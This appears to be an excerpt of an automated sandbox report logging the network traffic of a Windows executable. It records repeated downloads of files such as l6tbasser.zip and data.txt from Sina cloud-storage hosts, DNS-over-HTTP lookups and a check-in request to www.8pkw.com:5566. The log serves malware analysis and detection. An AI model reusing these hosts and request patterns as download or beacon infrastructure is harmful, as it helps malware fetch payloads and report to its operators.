      Source: global traffic | HTTP traffic detected: GET /question/c6tmassa HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/c6tmassa HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/c6tmassa HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/c6tmassa HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/c6tmassa HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/c6tmassa HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknown | TCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6F283E InternetReadFile,InternetReadFile,_memset,_memset,2_2_6A6F283E
      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: text/html;charset=utf-8 | Content-Encoding: gzip | Vary: Accept-Encoding | Server: Microsoft-IIS/8.5 | X-Powered-By: PHP/5.2.17 | X-Powered-By: ASP.NET | Date: Thu, 05 Dec 2024 13:25:11 GMT | Content-Length: 143 | Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 de 36 cd 2c 6b b3 9d 47 3f f3 68 97 fe 3f 6f db d5 a3 bb 77 e9 37 f9 df ff 03 32 72 70 8a 1f 00 00 00 | Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"6,kG?h?ow72rp
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/htmlContent-Encoding: gzipLast-Modified: Thu, 05 Dec 2024 06:24:27 GMTAccept-Ranges: bytesETag: "e4101b56de46db1:0"Vary: Accept-EncodingServer: Microsoft-IIS/8.5Date: Thu, 05 Dec 2024 13:25:15 GMTContent-Length: 1349Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 fe c7 bf f7 1f 7c fc bb ce aa 69 7b bd ca d3 79 bb 28 8f 7e e3 e4 31 7e a6 65 b6 bc f8 ec a3 7c f9 11 7f 92 67 33 fa 99 d2 f3 78 91 b7 59 3a 9d 67 75 93 b7 9f 7d f4 d5 9b 67 db 07 68 43 5f e9 77 cb 6c 91 7f f6 d1 65 91 5f ad aa ba fd 48 be 92 67 5a 2d db 7c 49 af 5d 15 b3 76 fe d9 2c bf 2c a6 f9 36 ff 31 4a d7 4d 5e 6f 37 d3 ac cc 26 65 fe d9 b2 1a a5 c5 b2 68 8b ac e4 0f f3 cf 76 c7 3b a3 74 91 bd 2b 16 eb 45 f0 11 35 0b 3e 0a d1 99 b7 ed 6a 3b ff 45 eb e2 f2 b3 8f 7e ef ed af 8e b7 4f aa c5 2a 6b 0b ea e4 23 87 50 91 7f 96 cf 2e 72 fb 6a 5b b4 65 7e f4 b4 9a ae 17 f4 fd e3 bb f2 b7 7e 59 16 cb b7 69 9d 97 9f 7d d4 b4 d7 65 de cc f3 bc fd 28 9d d7 f9 b9 7e 32 9e 36 0d 40 3d be ab 94 7b 3c a9 66 d7 f4 93 de 4e 1f cf 8a cb 74 5a 66 4d f3 d9 47 93 0b 34 a3 0f f9 79 bc c8 ea 5f b4 ce f3 74 92 cf b3 cb a2 aa 3f fb 28 2b db bc 5e 66 2d e1 ca 90 95 74 8f d2 fb 7b 3b ab 77 87 d3 aa ac ea 47 e9 8f 9f 9f 4f ef ed ec 1c 9e d3 70 b6 9b e2 07 f9 a3 94 bf e6 bf af f2 e2 62 de 3e 4a 3f a5 06 d4 c1 45 b1 dc 6e ab d5 a3 5d 34 68 f3 77 f4 c2 3c 9b 55 57 8f f6 56 ef 52 fc ff 3e fd ff c7 a7 d3 e9 47 47 ff d9 df f5 f7 fc 67 7f cf 1f f1 5f fd 03 ff c0 7f fe 47 fd 4d ff c5 9f f7 07 fd 67 7f ff df fa 9f fd fd ff e0 7f f9 a7 fd 55 ff c5 9f fe 47 fd 17 7f c1 9f f7 3f fe 7d 7f dc 7f f5 37 fe 9d ff f9 1f ff 77 fd 57 7f ff df ff 5f fc f9 7f d0 7f f1 37 fe 29 ff e5 5f 
ff 47 ff d7 7f d6 df f2 5f fc 31 7f d9 7f f5 f7 ff 8d ff d9 df fb 77 3c be 4b dd 61 3c fe 10 83 c1 ef f9 a3 c7 d3 f9 fa f7 df ed 36 c0 43 a8 a4 ff c5 9f f1 37 a5 ff d9 df f7 e7 a4 ff f9 9f fc 67 a5 ff c5 9f f6 77 a4 ff d5 df f6 77 a7 ff e5 1f fd 47 a5 ff c5 9f f7 d7 85 2f 3c be 4b 20 3b 40 ba bd f4 d0 c0 f3 78 0d 61 a0 5f 7a 0f cd ff d1 ee f8 3f ff cb fe 9c ff fa 4f fb 1b fe f3 3f f9 ef fb cf ff c8 bf e7 d1 d9 f2 75 5e b7 a3 6f 57 8b 7c f4 32 bb c8 bf 5a 3d be 4b ad 86 df df 1b ff 67 7f cf 9f fc 5f fc b9 7f 1b 8d 83 88 f8 5f fd 41 7f d2 7f fe 0f fe a1 44 be ff fc 1f f8 c3 77 ef ff 97 7f e5 9f f2 5f ff 29 7f e1 0d 00 ee 39 00 ff c5 9f f8 27 fd 97 7f d9 df f3 5f fc e9 7f f8 7f fd e7 fc 79 ff e5 1f f2 77 ff 97 7f f1 df f0 9f ff 0d 7f ce 7f 49 5f fd 09 7f f9 7f f9 67 ff bd ff f5 9f fd 47 6c 00 c5 b0 f6 c7 ff f9 df f0 67 fd 17 7f c6 df fd 9f ff 0d 7f c9 7f f1 e7 fd f1 3f f1 13 ff e3 df f7 e7 ec dd db dd 7f 70 70 b0 77 b0 b7 e1 65 bc 7b 7f 4c d3 40 b3 f0 13 3f f1 5f fe 03 7f 19 bd 78 70 ef fe fd fd 4f 77 f6 1e de f0 de a7
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/cssContent-Encoding: gzipLast-Modified: Sat, 13 Oct 2018 11:50:08 GMTAccept-Ranges: bytesETag: "0188be3ea62d41:0"Vary: Accept-EncodingServer: Microsoft-IIS/8.5Date: Thu, 05 Dec 2024 13:25:15 GMTContent-Length: 649Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 be f5 8b 7f e3 24 a5 67 91 d5 17 c5 f2 d1 ce a1 fc b9 ca 66 b3 62 79 61 ff 2e 8b a6 dd 6e da eb 32 7f 94 2e ab 65 4e 1f ff 92 df 38 c9 f4 e5 36 7f d7 6e cf f2 69 55 67 6d 51 2d 6d 13 fa 2a 9d 56 65 55 3f 4a 7f 7c 67 07 b0 e8 a5 f1 e4 42 5f 9b 64 d3 b7 17 75 b5 5e ce ec f7 f4 69 7a 55 cc da f9 a3 fb bb 3b ab 77 fa c9 3c 2f 2e e6 ed a3 bd 87 ee 23 83 e0 7d fb c9 dd 6f cd 8a 66 55 66 d7 8f d2 f3 32 7f 77 f8 ad bb f2 79 75 99 d7 e7 65 75 f5 28 9d 17 b3 59 be a4 e6 82 c5 9e a2 21 fd ed ee ec fc ee f4 15 fd 6d bb db 71 dd 09 79 b6 db 6a f5 28 dd 93 8f 2d 98 df 7f 57 01 e9 50 eb 7c 46 5f d3 df 0e 32 bf 40 1f 10 66 55 d6 3e 4a cb fc bc a5 4f e4 b3 ef d6 45 4b 43 d9 5e 54 b3 fc 11 21 db 16 d3 ac dc 2e 6b 6a 40 df a6 e7 d5 92 48 5f fc 80 28 bf ef 00 31 c9 9b 79 36 a3 81 ed ad de a5 f8 3f d1 22 a5 29 58 5e e4 a3 6d fc 8d ff e3 b3 8b 3a f7 87 fd fb 87 03 f7 a9 aa c3 04 7a 8f 52 6f 02 ca 62 99 6f 2b 59 cc f8 e9 63 a2 39 e3 91 95 c5 05 cd fa 4f af 9b b6 38 bf b6 94 f7 30 df fd d4 be c3 9f 5e 09 ac fb 76 d2 95 76 3f 9e 3f 98 de db 3f d7 0f b9 e9 79 b6 28 4a 9a d4 8f ff f3 7f e0 6f f8 af fe fe bf f1 bf fe 73 ff f0 ff fa ef fd 93 3f d6 16 7e f7 c0 5a 3f 0e c9 6c c7 9d ae cb a3 b2 d0 d1 eb 58 79 4a ef 31 76 b6 1d 35 7a 74 5e d4 c4 f2 d5 f9 76 7b bd ca 23 af 00 71 f3 c2 3d fd 3e ec 96 3e 30 6f e0 13 22 82 10 ce 7b 8f 10 22 da a6 46 8e 2c 03 4f ca 6a fa 96 9a d2 
67 a1 94 3c 38 d8 db df 45 d7 f4 85 a5 d9 f9 79 94 60 1f f9 04 fb c8 6f a1 d4 ff d4 52 9f 3f d5 99 3a 60 24 e9 c3 80 b8 d3 7c d9 e6 86 25 8d f0 11 d9 52 37 b1 21 93 38 30 4a 03 a6 9a f2 4e 87 00 21 b1 2d 39 fc 17 81 e9 2f f9 7f 00 b2 22 a5 03 ad 04 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"$gfbya.n2.eN86niUgmQ-m*VeU?J|gB_du^izU;w</.#}ofUf2wyueu(Y!mqyj(-WP|F_2@fU>JOEKC^T!.kj@H_(1y6?")X^m:zRobo+Yc9O80^vv???y(Jos?~Z?lXyJ1v5zt^v{#q=>>0o"{"F,Ojg<8Ey`oR?:`$|%R7!80JN!-9/"
      Source: global traffic | HTTP traffic detected: GET /kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&x=91317019281 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSiE 6.0; Windows NT 5.1;) | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | Host: www.8pkw.com:5566 | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: www.baidu.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: www.sogou.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: www.so.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: www.sina.com.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: www.baidu.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */* | Accept-Language: en-CH | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: shoufeifz.qijianfz.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /style.css HTTP/1.1 | Accept: */* | Referer: http://shoufeifz.qijianfz.com/ | Accept-Language: en-CH | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: shoufeifz.qijianfz.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1 | User-Agent: D74384FB8D2C9 | Host: 182.254.116.116
      Source: global traffic | HTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1 | User-Agent: D74384FB8D2C9 | Host: 114.114.114.114
      Source: global traffic | HTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1 | User-Agent: D74384FB8D2C9 | Host: 119.29.29.29
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1 | User-Agent: D74384FB8D2C9 | Host: 114.114.114.114
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 114.114.114.114
